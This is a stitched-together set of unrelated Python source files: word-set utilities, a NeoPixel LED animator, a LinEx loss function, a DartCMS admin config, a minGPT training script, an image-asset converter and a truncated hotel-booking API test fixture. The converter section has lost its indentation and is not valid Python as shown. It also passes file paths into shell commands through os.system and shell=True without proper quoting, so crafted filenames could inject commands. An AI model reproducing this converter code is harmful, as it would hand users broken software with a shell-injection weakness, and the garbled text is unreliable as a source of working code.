        # did a raw substring scan of the text, so partial words such as
        # 'he' (inside 'hey') wrongly tested True.
        return word in self.word_set
#
# Dictionary class
#
class Dictionary(WordSet):
    """
    Construct a dictionary from all the words in a text file.
    Subclass of WordSet with a file based initializer.
    >>> from wordset import Dictionary
    >>> Dictionary('assets/lincoln.txt').words()[55]
    'government'
    """
    def __init__(self, filename):
        # Read the whole file and delegate word parsing to WordSet.
        with open(filename) as fp:
            text = fp.read()
        WordSet.__init__(self, text)
#
# WordMunch class
#
class WordMunch(WordSet):
    """
    Perform analytics on a set of unique words.
    Subclass of WordSet that provides analytics on the words.
    """
    def filter(self, ffun):
        """Filter set to include only those that satisfy the filter function predicate."""
        # A fresh WordSet is built on purpose: WordSet.words() appends into
        # the instance's word_set, so reusing self across calls would
        # accumulate duplicates.
        return [word for word in WordSet(self.text).words() if ffun(word)]

    def frequency(self):
        """Return a dictionary of the frequency of each letter in the word set."""
        freq = {}
        # Join all unique words and tally characters in one pass.
        for letter in ''.join(WordSet(self.text).words()):
            freq[letter] = freq.get(letter, 0) + 1
        return freq
|
#!/usr/bin/env python
from random import randrange as rand
import neopixel
import datetime
from PIL import Image
import time
import sys
import os
color_scheme = 'RGB'
class SingleAnimation:
    """Drive a NeoPixel strip from one or more images, one image row per frame.

    Each image is resized to (strip width x duration*fps) so that playing
    one row per frame at *fps* lasts *duration_s* seconds.
    """
    active_id = 0
    frame = 0
    state = True

    def __init__(self, strip, images_src, duration_s, *fps):
        # BUG FIX: *fps arrives as a tuple; the original stored the tuple
        # itself ('fps or 25'), which broke the height computation below.
        # Passing the frame rate positionally still works as before.
        self.fps = fps[0] if fps else 25
        self.duration_s = duration_s
        self.width = strip['num']
        self.height = duration_s * self.fps
        self.images_src = images_src
        # BUG FIX: 'images' was a class attribute, so every instance shared
        # (and appended into) the same list; make it per-instance.
        self.images = []
        for image_src in images_src:
            try:
                image = Image.open(image_src).convert(color_scheme)
                image = image.resize((self.width, self.height))
                image = image.transpose(Image.FLIP_LEFT_RIGHT)
                self.images.append(image)
            except OSError as e:
                print("Error:", str(e))
        self.images_count = len(self.images)
        if self.images_count == 0:
            print("no images")
            sys.exit(1)
        self.strip = neopixel.NeoPixel(strip['pin'],
                                       strip['num'],
                                       brightness=0.1,
                                       auto_write=False)
        self.active_image = self.images[self.active_id]
        print("start image", self.images_src[self.active_id])

    def clear_strip(self):
        """Blank every pixel on the strip."""
        self.strip.fill((0, 0, 0))
        self.strip.show()

    def brightness_set(self, brightness):
        """Set brightness, clamped into [0, 1]."""
        self.strip.brightness = min(1, max(0, brightness))

    def brightness_plus(self):
        # BUG FIX: the original used '=+ 0.1', which *assigned* +0.1
        # instead of incrementing; clamp at full brightness.
        self.strip.brightness = min(1, self.strip.brightness + 0.1)

    def brightness_minus(self):
        # BUG FIX: the original used '=- 0.1', which assigned -0.1;
        # clamp at zero.
        self.strip.brightness = max(0, self.strip.brightness - 0.1)

    def faster(self):
        # BUG FIX: was missing 'self'; still an unimplemented placeholder.
        pass

    def slower(self):
        # BUG FIX: was missing 'self'; still an unimplemented placeholder.
        pass

    def set_image(self, _id):
        """Switch to image *_id* (ignored if out of range), restart playback
        and return the source path of the now-active image."""
        try:
            self.active_image = self.images[_id]
            self.active_id = _id
        except IndexError:
            print('no image', _id)
        self.frame = 0
        src = self.images_src[self.active_id]
        print(src)
        return src

    def next_image(self, direction=1):
        """Step forward (direction=1) or back (direction=-1), wrapping at
        either end, and return the active image's basename."""
        self.active_id = direction + self.active_id
        if direction == 1 and self.active_id == self.images_count:
            self.active_id = 0
        # BUG FIX: the original wrapped when the id *reached* 0, which made
        # image 0 unreachable when stepping backwards; wrap only below 0.
        if direction == -1 and self.active_id < 0:
            self.active_id = self.images_count - 1
        return os.path.basename(self.set_image(self.active_id))

    def move_to_next_frame(self):
        """Render the current frame, then advance (wrapping at the end)."""
        if self.frame == self.active_image.size[1]:
            # self.next_image()
            self.frame = 0
        self.show_frame()
        self.frame += 1

    def show_frame(self):
        """Copy one image row onto the strip and latch it."""
        for i in range(self.width):
            self.strip[i] = self.active_image.getpixel((i, self.frame))
        self.strip.show()
|
import math
import numpy as np
def LinEx(y: int, est: int):
    """Asymmetric LinEx loss for one estimate.

    :param y: true value
    :param est: estimated value (ŷ)
    :return: exp[α(y − ŷ)] − α(y − ŷ) − 1, with α = 0.1
    """
    alpha = 0.1
    scaled_diff = alpha * (y - est)
    return math.exp(scaled_diff) - scaled_diff - 1
def get_error(ys: np.ndarray, ests: np.ndarray):
    """
    A function that calculates the average error over a set of estimations
    :param ys: a numpy array with shape (n,1) of true values
    :param ests: a numpy array with shape (n,1) of estimations
    :return: the average LinEx error as a float

    Bug fix: the original evaluated ``LinEx(y, int(3 * est))`` — tripling
    and truncating each estimate, contradicting the docstring (apparently
    a debugging leftover). The loss is now computed on the estimates as
    given, vectorised with numpy instead of an index loop.
    """
    n = ests.shape[0]
    assert n == ys.shape[0]
    alpha = 0.1
    prod = alpha * (np.asarray(ys, dtype=float) - np.asarray(ests, dtype=float))
    return float(np.mean(np.exp(prod) - prod - 1))
def test():
    """Smoke-test get_error on a tiny hand-made sample."""
    y = np.array([[2], [0], [1], [2], [1]])
    est = np.array([[3], [0], [1], [1], [1]])
    print(y.shape)
    print(get_error(y, est))


# Bug fix: a stray bare `L` sat between test() and the main guard and
# raised NameError as soon as the module was imported; removed.
if __name__ == "__main__":
    test()
|
from dartcms.utils.config import DartCMSConfig
from dartcms.utils.loading import get_model
from django.forms import modelform_factory
# Feeds section configuration for the DartCMS admin.
app_name = 'feeds'
# Resolve the model lazily so a project can swap the 'feeds' implementation.
Feed = get_model('feeds', 'Feed')
config = DartCMSConfig({
    'model': Feed,
    'grid': {
        'grid_columns': [
            {'field': 'type', 'width': '10%'},
            {'field': 'name', 'width': '90%'},
        ],
        # Nested CRUD for a single feed's items, mounted under items/.
        'additional_grid_actions': [
            {'url': 'items', 'kwarg_name': 'feed', 'include_urls': 'dartcms.apps.feeds.items.urls'}
        ]
    },
    'form': {
        'form_class': modelform_factory(Feed, exclude=[]),
    }
})
urlpatterns = config.get_urls()
|
# make deterministic
from mingpt.utils import set_seed
set_seed(42)
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
import math
from torch.utils.data import Dataset
from mingpt.model import GPT, GPTConfig,GPTForClassification
from mingpt.trainer import Trainer, TrainerConfig
from mingpt.utils import sample
import logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
import pdb
from sample_dataset import SampleDataset
if __name__ == '__main__':
    block_size = 1000 # spatial extent of the model for its context
    # Train/validation splits both come from the same on-disk sample set.
    train_dataset = SampleDataset(dataset_name = 'sample_data', data_dir='./data/', mode='training', block_size=block_size)
    validation_dataset = SampleDataset(dataset_name = 'sample_data', data_dir='./data/', mode='validation', block_size=block_size)
    # Binary classification head on top of the GPT trunk.
    num_class = 2
    mconf = GPTConfig(train_dataset.vocab_size, block_size,num_class,
                      n_layer=8, n_head=8, n_embd=512)
    model = GPTForClassification(mconf)
    tconf = TrainerConfig(max_epochs=200, batch_size=12, learning_rate=6e-4,
                          lr_decay=True, warmup_tokens=12*20, final_tokens=200*len(train_dataset)*block_size,
                          num_workers=4,ckpt_path='./logs_/')
    trainer = Trainer(model, train_dataset, validation_dataset, tconf)
    trainer.train()
    print('Done')
|
import argparse
import hashlib
import json
import logging
import os
import subprocess
import sys

import coloredlogs
from wand.image import Image

from basset.exceptions import *
class Converter:
    def __init__(self):
        """Set up colored logging and default (empty) conversion settings."""
        coloredlogs.install()
        self.input_dir = ""
        self.output_dir = ""
        self.force_convert = False
        # Maps destination path -> SHA-1 of the source it was generated from.
        self.converted_files_hashes = {}
@staticmethod
def allowed_image_types():
return ["eps", "pdf", "svg", "psd"]
@staticmethod
def sha1_of_file(file_path):
sha = hashlib.sha1()
with open(file_path, 'rb') as f:
for line in f:
sha.update(line)
return sha.hexdigest()
def convert_single_file(self, source_file, destination_file, target_resolution, scale_factor, transparent_color):
sha1_of_original_file = self.sha1_of_file(source_file)
add_transparency_part = ""
if transparent_color:
add_transparency_part = "-transparent \"{0}\"".format(transparent_color)
self.converted_files_hashes[destination_file] = sha1_of_original_file
convert_string = "convert " \
"-density {0}00% " \
"-background none " \
"\"{1}\" " \
" {2} " \
"-resize {3}x{4} " \
"\"{5}\"".format(scale_factor,
source_file,
add_transparency_part,
target_resolution[0],
target_resolution[1],
destination_file)
os.system(convert_string)
def check_if_file_needs_reconverting(self, source_file, destination_file):
sha1_of_original_file = self.sha1_of_file(source_file)
destination_file_missing = not os.path.isfile(destination_file)
destination_file_was_generated_from_the_different_file = destination_file in self.converted_files_hashes and \
self.converted_files_hashes[
destination_file] != sha1_of_original_file
return self.force_convert or destination_file_missing or destination_file_was_generated_from_the_different_file
@staticmethod
def return_first_line_containing_string(lines, match_string):
for line in lines.splitlines():
if match_string in line:
return line
return None
@staticmethod
def get_image_metadata(path):
raw = subprocess.check_output("identify -verbose \"{0}\"".format(path),
shell=True).decode("utf-8")
resolution_id = "Geometry:"
transparent_color_id = "Transparent color:"
resolution = Converter.return_first_line_containing_string(raw, resolution_id)
resolution = resolution.replace(resolution_id, "").strip(" \t\n\r").split("+")[0]
resolution_parts = resolution.split("x")
transparent_color = Converter.return_first_line_containing_string(raw, transparent_color_id)
if transparent_color:
transparent_color = transparent_color.replace(transparent_color_id, "").strip(" \t\n\r")
return (int(resolution_parts[0]), int(resolution_parts[1])), transparent_color
def convert(self):
self.input_dir = self.input_dir.rstrip('\\/')
self.output_dir = self.output_dir.rstrip('\\/')
self.input_dir = os.path.expandvars(os.path.expanduser(self.input_dir))
self.output_dir = os.path.expandvars(os.path.expanduser(self.output_dir))
logging.info("Converting vector files from {0} to {1}".format(self.input_dir, self.output_dir))
temp_file = os.path.join(self.output_dir, ".basset_temp")
if os.path.isfile(temp_file):
with open(temp_file, "r") as data_file:
self.converted_files_hashes = json.load(data_file)
self.check_if_input_dir_contains_vector_assets()
self.check_if_input_dir_contains_xcassets()
converted_files_count = 0
for original_base_path, subdirectories, files in os.walk(self.input_dir):
for filename in files:
if "." in filename and filename[0] is not ".":
basename = filename.split(".")[0]
extension = filename.split(".")[1].lower()
logging.info("selecting file0: " + basename + ", extension: " + extension)
if extension in Converter.allowed_image_types():
new_base_path = original_base_path.replace(self.input_dir, self.output_dir)
if not os.path.exists(new_base_path):
os.makedirs(new_base_path)
original_full_path = os.path.join(original_base_path, filename)
logging.info("selecting file: " + filename + ", extension: " + extension)
if extension == "pdf":
destination_templates = [(1, ".pdf", False)]
else:
destination_templates = [(1, ".png", True)]
if extension != "png":
destination_templates.append((2, "@2x.png", True))
destination_templates.append((3, "@3x.png", True))
selected_destination_templates = []
for template in destination_templates:
destination_path = os.path.join(new_base_path, basename + template[1])
if self.check_if_file_needs_reconverting(original_full_path, destination_path):
selected_destination_templates.append(template)
if len(selected_destination_templates) > 0:
try:
original_size, transparent_color = Converter.get_image_metadata(original_full_path)
for template in selected_destination_templates:
new_image_size = (original_size[0] * template[0], original_size[1] * template[0])
destination_path = os.path.join(new_base_path, basename + template[1])
if template[2]:
self.convert_single_file(original_full_path, destination_path, new_image_size,
template[0], transparent_color)
logging.info("Converted {0} to {1}".format(original_full_path, destination_path))
else:
os.system("cp {0} {1}".format(original_full_path, destination_path))
logging.info("Copied {0} to {1}".format(original_full_path, destination_path))
converted_files_count += 1
except subprocess.CalledProcessError as error:
logging.error("Error while processing {0}: {1}".format(original_full_path, error))
if converted_files_count > 0:
with open(temp_file, "w+") as data_file:
json.dump(self.converted_files_hashes, data_file, indent=1)
logging.info("Images conversion finished. Processed " + str(converted_files_count) + " images")
def check_if_input_dir_contains_xcassets(self):
for original_base_path, subdirectories, files in os.walk(self.input_dir):
if original_base_path.endswith(".imageset"):
raise AssetsDirContainsImagesetDirectoryException(original_base_path, self.input_dir)
def check_if_input_dir_contains_vector_assets(self):
directories_with_vector_files = {}
if not os.path.isdir(self.input_dir):
for path, subdirectories, files in os.walk(os.getcwd()):
path = os.path.relpath(path, os.getcwd())
for filename in files:
if "." in filename and filename[0] is not ".":
extension = filename.split(".")[1]
if extension.lower() in Converter.allowed_image_types():
top_dir_in_path = path.split(os.sep)[0]
if top_dir_in_path in directories_with_vector_files:
directories_with_vector_files[top_dir_in_path] += 1
else:
directories_with_vector_files[top_dir_in_path] = 1
if directories_with_vector_files is not None:
max_vector_files_count = -1
directory_with_max_vector_files = None
for path in directories_with_vector_files.keys():
if not path.endswith(".xcassets"):
if directories_with_vector_files[path] > max_vector_files_count:
max_vector_files_count = directories_with_vector_files[path]
directory_with_max_vector_files = path
raise AssetsDirNotFoundException(directory_with_max_vector_files)
def main(args_to_parse):
    """Parse CLI arguments and run the asset conversion.

    :param args_to_parse: argv-style list (excluding the program name).
    """
    parser = argparse.ArgumentParser(description='Converts raw assets to proper PNG(s).')
    parser.add_argument('-i', '--input_dir', default="./Assets", help='directory with raw assets')
    parser.add_argument('-f', '--force_convert', default="False",
                        help='should regenerate assets even when they were generated before')
    parser.add_argument('-o', '--output_dir', default="./GeneratedAssets",
                        help='directory where generated PNG(s) will be stored')
    parsed_args = parser.parse_args(args_to_parse)

    converter = Converter()
    converter.input_dir = parsed_args.input_dir
    converter.output_dir = parsed_args.output_dir
    # Bug fix: this line used to assign force_convert's value to output_dir,
    # silently discarding -o and never enabling force_convert. The flag
    # arrives as a string (default "False"), so interpret it explicitly.
    converter.force_convert = parsed_args.force_convert.lower() in ("true", "1", "yes")
    converter.convert()
if __name__ == '__main__':
    # Delegate to main() with the CLI arguments (argv[0] is the script name).
    main(sys.argv[1:])
|
b2b_hotel_page_response = {
"debug": {
"b2b_request": {
"checkin": "2020-08-05",
"checkout": "2020-08-06",
"currency": None,
"residency": "ru",
"timeout": None,
"language": "ru",
"guests": [{"adults": 1, "children": []}],
"upsells": {
"early_checkin": {"time": "2020-08-05T10:00:00"},
"late_checkout": {"time": "2020-08-06T15:00:00"},
"only_eclc": True,
},
"id": "test_hotel",
},
"key_id": 1,
"validation_error": None,
},
"error": None,
"status": "ok",
"data": {
"hotels": [
{
"id": "test_hotel",
"rates": [
{
"daily_prices": ["97.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "97.90",
"show_amount": "97.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "16.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "97.90",
"amount_show": "97.90",
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-cfcbed18-bd30-5299-8484-84324c28a77b",
},
{
"daily_prices": ["97.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "97.90",
"show_amount": "97.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "16.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "97.90",
"amount_show": "97.90",
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-1f3fd417-7765-5653-915a-300ce68f9560",
},
{
"daily_prices": ["144.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "144.90",
"show_amount": "144.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "24.15",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "144.90",
"amount_show": "144.90",
"commission_info": {
"show": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "6.19",
},
"perks": {
"early_checkin": [
{
"charge_price": "29.00",
"show_price": "29.00",
"commission_info": {
"show": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "29.00",
"show_price": "29.00",
"commission_info": {
"show": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 981,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "31.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "123.96",
"currency_code": "PLN",
},
"book_hash": "h-eca4e776-f44c-5716-8d3c-4d9d749e937c",
},
{
"daily_prices": ["160.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "160.90",
"show_amount": "160.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "26.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "160.90",
"amount_show": "160.90",
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-f4bb3906-9fcb-5bb5-a5e0-f19a40a7194c",
},
{
"daily_prices": ["160.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "160.90",
"show_amount": "160.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "26.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "160.90",
"amount_show": "160.90",
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-b415f7bc-c335-584a-a5eb-4969f78cf4aa",
},
{
"daily_prices": ["199.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "199.90",
"show_amount": "199.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "33.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "199.90",
"amount_show": "199.90",
"commission_info": {
"show": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "8.54",
},
"perks": {
"early_checkin": [
{
"charge_price": "40.00",
"show_price": "40.00",
"commission_info": {
"show": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "40.00",
"show_price": "40.00",
"commission_info": {
"show": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Superior (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 312,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "43.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "171.62",
"currency_code": "PLN",
},
"book_hash": "h-f245d0a4-fbaf-59cc-86f5-69c3a54fc06d",
},
{
"daily_prices": ["231.90"],
"meal": "breakfast-buffet",
"payment_options": {
